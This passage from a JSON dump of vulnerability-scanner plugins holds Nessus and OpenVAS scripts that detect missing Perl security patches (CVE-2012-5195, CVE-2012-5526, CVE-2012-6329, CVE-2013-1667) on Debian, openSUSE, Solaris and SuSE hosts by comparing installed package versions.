Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2586. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63270);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:35\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\");\n script_bugtraq_id(56287, 56562);\n script_xref(name:\"DSA\", value:\"2586\");\n\n script_name(english:\"Debian DSA-2586-1 : perl - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities were discovered in the implementation of the Perl\nprogramming language :\n\n - CVE-2012-5195\n The 'x' operator could cause the Perl interpreter to\n crash if very long strings were created.\n\n - CVE-2012-5526\n The CGI module does not properly escape LF characters in\n the Set-Cookie and P3P headers.\n\nIn addition, this update adds a warning to the Storable documentation\nthat this package is not suitable for deserializing untrusted data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689314\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=693420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=695223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-5195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-5526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/perl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2586\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the perl packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.10.1-17squeeze4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libcgi-fast-perl\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libperl-dev\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libperl5.10\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perl\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perl-base\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perl-debug\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perl-doc\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perl-modules\", reference:\"5.10.1-17squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"perl-suid\", reference:\"5.10.1-17squeeze4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:21:30", "bulletinFamily": "scanner", "description": "Perl was updated to fix 3 security issues :\n\n - fix rehash denial of service (compute time) [bnc#804415] [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - sanitize input in Maketext.pm to avoid code injection [bnc#797060] [CVE-2012-6329]\n\nIn openSUSE 12.1 also the following non-security bug was fixed :\n\n - fix IPC::Open3 bug when '-' is used [bnc#755278]", "modified": "2019-02-07T00:00:00", "id": "OPENSUSE-2013-225.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74932", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : perl (openSUSE-SU-2013:0497-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-225.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74932);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/02/07 9:34:55\");\n\n script_cve_id(\"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56562, 56950, 58311);\n\n script_name(english:\"openSUSE Security Update : perl (openSUSE-SU-2013:0497-1)\");\n script_summary(english:\"Check for the openSUSE-2013-225 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Perl was updated to fix 3 security issues :\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\nIn openSUSE 12.1 also the following non-security bug was fixed :\n\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=755278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=797060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=804415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-03/msg00068.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-base-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-base-debuginfo-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-debuginfo-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-debugsource-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-base-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-base-debuginfo-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-debuginfo-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-base-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-base-debuginfo-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-debuginfo-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-debugsource-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-base-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-base-debuginfo-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-debuginfo-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-base-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-base-debuginfo-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-debuginfo-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-debugsource-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-32bit-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-base-32bit-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-base-debuginfo-32bit-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-debuginfo-32bit-5.16.2-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-32bit / perl / perl-base-32bit / perl-base / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:16", "bulletinFamily": "scanner", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - Heap-based buffer overflow in the Perl_repeatcpy function in util.c in Perl 5.12.x before 5.12.5, 5.14.x before 5.14.3, and 5.15.x before 15.15.5 allows context-dependent attackers to cause a denial of service (memory consumption and crash) or possibly execute arbitrary code via the 'x' string repeat operator.\n (CVE-2012-5195)\n\n - CGI.pm module before 3.63 for Perl does not properly escape newlines in (1) Set-Cookie or (2) P3P headers, which might allow remote attackers to inject arbitrary headers into responses from applications that use CGI.pm. (CVE-2012-5526)\n\n - The _compile function in Maketext.pm in the Locale::Maketext implementation in Perl before 5.17.7 does not properly handle backslashes and fully qualified method names during compilation of bracket notation, which allows context-dependent attackers to execute arbitrary commands via crafted input to an application that accepts translation strings from users, as demonstrated by the TWiki application before 5.1.3, and the Foswiki application 1.0.x through 1.0.10 and 1.1.x through 1.1.6. (CVE-2012-6329)", "modified": "2018-11-15T00:00:00", "id": "SOLARIS11_PERL-512_20131017.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80727", "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : perl-512 (cve_2012_5195_heap_buffer)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80727);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : perl-512 (cve_2012_5195_heap_buffer)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Heap-based buffer overflow in the Perl_repeatcpy\n function in util.c in Perl 5.12.x before 5.12.5, 5.14.x\n before 5.14.3, and 5.15.x before 15.15.5 allows\n context-dependent attackers to cause a denial of service\n (memory consumption and crash) or possibly execute\n arbitrary code via the 'x' string repeat operator.\n (CVE-2012-5195)\n\n - CGI.pm module before 3.63 for Perl does not properly\n escape newlines in (1) Set-Cookie or (2) P3P headers,\n which might allow remote attackers to inject arbitrary\n headers into responses from applications that use\n CGI.pm. (CVE-2012-5526)\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. (CVE-2012-6329)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.oracle.com/sunsecurity/cve-2012-5195-heap-buffer-overrun-vulnerability-in-perl\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-5526-configuration-vulnerability-in-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?975ebb1f\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-6329-code-injection-vulnerability-in-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0ed10ce\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.7.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:perl-512\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^perl-512$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-512\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.7.0.5.0\", sru:\"SRU 11.1.7.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : perl-512\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"perl-512\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:18:41", "bulletinFamily": "scanner", "description": "This update of Perl 5 fixes the following security issues :\n\n - fix rehash DoS [bnc#804415] [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - fix glob denial of service [bnc#796014] [CVE-2011-2728]\n\n - sanitize input in Maketext.pm [bnc#797060] [CVE-2012-6329]\n\n - make getgrent work with long group entries [bnc#788388]", "modified": "2016-12-22T00:00:00", "id": "SUSE_PERL-8479.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=65249", "published": "2013-03-13T00:00:00", "title": "SuSE 10 Security Update : Perl (ZYPP Patch Number 8479)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65249);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:42:28 $\");\n\n script_cve_id(\"CVE-2011-2728\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n\n script_name(english:\"SuSE 10 Security Update : Perl (ZYPP Patch Number 8479)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of Perl 5 fixes the following security issues :\n\n - fix rehash DoS [bnc#804415] [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - fix glob denial of service [bnc#796014] [CVE-2011-2728]\n\n - sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n\n - make getgrent work with long group entries [bnc#788388]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2728.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-5526.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-6329.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1667.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8479.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"perl-5.8.8-14.21.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"perl-32bit-5.8.8-14.21.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"perl-5.8.8-14.21.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"perl-32bit-5.8.8-14.21.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-03-19T12:39:23", "bulletinFamily": "scanner", "description": "It was discovered that the CGI module for Perl does not filter LF\ncharacters in the Set-Cookie and P3P headers, potentially allowing\nattackers to inject HTTP headers.", "modified": "2019-03-18T00:00:00", "published": "2013-09-18T00:00:00", "id": "OPENVAS:1361412562310892587", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892587", "title": "Debian Security Advisory DSA 2587-1 (libcgi-pm-perl - HTTP header injection)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2587_1.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2587-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892587\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-5526\");\n script_name(\"Debian Security Advisory DSA 2587-1 (libcgi-pm-perl - HTTP header injection)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 11:53:02 +0200 (Wed, 18 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2012/dsa-2587.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_tag(name:\"affected\", value:\"libcgi-pm-perl on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), this problem has been fixed in\nversion 3.49-1squeeze2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.61-2.\n\nWe recommend that you upgrade your libcgi-pm-perl packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that the CGI module for Perl does not filter LF\ncharacters in the Set-Cookie and P3P headers, potentially allowing\nattackers to inject HTTP headers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 